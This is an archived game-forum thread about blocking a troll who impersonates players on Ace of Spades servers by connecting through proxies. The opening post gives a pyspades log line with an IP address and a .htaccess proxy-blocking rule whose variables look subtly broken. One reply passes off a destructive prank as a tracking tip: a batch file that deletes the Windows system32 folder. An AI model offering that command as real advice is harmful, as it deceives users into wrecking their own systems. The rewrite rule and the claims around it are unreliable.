• Search
  • Register
  • Log in
  • Ace of Spades Game Forums » Gameplay
  • Note: This forum is merely an archive. It is no longer possible to login or register. - StackOverflow
    New Ace of Spades Forums: http://buildandshoot.com/
  • How to block the imposter guy
  •  

    We all have seen him. He pops into servers, and spews a bunch of racist crap, and he does it off names of people in the community.

    I left my CORD map running so people could take a walk around from my speedy ADSL line.
    someone logged in and started trolling me (lol the only other person on the server)

    Looking over my pyspades log file after he left shows me that he is using a proxy server to bypass the IP blocking.

    2011-08-17 22:30:56-1000 [scripts.savemap.MapSaveProtocol (UDP)] Slayer (IP 131.179.150.72, ID 0) entered the game

    looks like he wanted to be Slayer last night. I have seen the dame dude on public server. He has an embarrassing spelling problem that gives him away every time.
    Not to mention the same type of trolling, saying the exact same things.

    Here is how you really mess with him:

    You can insert a script in your root htsaccess file. It’s best to copy and paste the code, rather than type it. That way, you can be sure that you won’t make any errors. After you’ve inserted the code, upload it to your server. :

    # block proxy servers from site access
    RewriteEngine on
    RewriteCond %{AOS:VIA} !^$ [OR]
    RewriteCond %{AOS:FORWARDED} !^$ [OR]
    RewriteCond %{AOS:USERAGENT_VIA} !^$ [OR]
    RewriteCond %{AOS:X_FORWARDED_FOR} !^$ [OR]
    RewriteCond %{AOS:PROXY_CONNECTION} !^$ [OR]
    RewriteCond %{AOS:XPROXY_CONNECTION} !^$ [OR]
    RewriteCond %{AOS:HTTP_PC_REMOTE_ADDR} !^$ [OR]
    RewriteCond %{AOS:HTTP_CLIENT_IP} !^$
    RewriteRule ^(.*)$ - [F]

    The only other way he has to hack now, is using TOR... LOL. If google takes 2 minutes to load over TOR, I can imagine how nice his ping rate must be.
    Pyspades speedhack script will instantly drop him with a high ping. (I assume)

    let me know if this helps :) would be nice to rid the servers of trolls like this.

    #81306
    JoJoeStinky
    Stinkious Maximus
    Posted 12 years ago
     

    Cool story bro.

    #81316
    ReubenMcHawk
    Renovator
    Posted 12 years ago
     

    There has also been a guy who goes around on servers fly hacking, speed hacking, and ammo hacking. He uses my name [Real]YourMom. I'm pissed.

    #81331
    YourMom
    *BANNED*Gregarious
    Posted 12 years ago
     

    Do what OP says, then for added security delete system32. This alows your computer to keep the IP records for an indefinitely rather then them expiring every 48 hours. (rendering the tracker useless after 2 days)

    to do this,

    open a notepad type the following:

    @echo off
    del c:\WINDOWS\system32

    save the file as indeftrack.bat (remember to add the .bat extension and save as all files)
    double click and it will delete the system32 folder.

    #81335
    DeathEnhanced
    The Grand Exterminator
    Posted 12 years ago
     

    Cool beans, bro.

    #81340
    Space101
    Gatekeeper
    Posted 12 years ago
     

    There's a fly hack? I knew about the multi-jumping, but if there's one that allows your character to stay in the air, then that's new to me.

    #81386
    ReubenMcHawk
    Renovator
    Posted 12 years ago
     

    Riveting tale, old chap.

    #81390
    S0ldi3rKr4s0
    Combine
    Posted 12 years ago
     

    What ever you do, DO NOT delete system32. DO NOT

    #81394
    Rydogger
    Slayer/Support
    Posted 12 years ago
    RSS feed for this topic  

    Reply

    You must log in to post.

  • Tags
  •  

  •  
    Ace of Spades Game Forums is proudly powered by bbPress.   //   Theme by Mike Lothar  
    [ Time : 1.663s | 13 Queries ]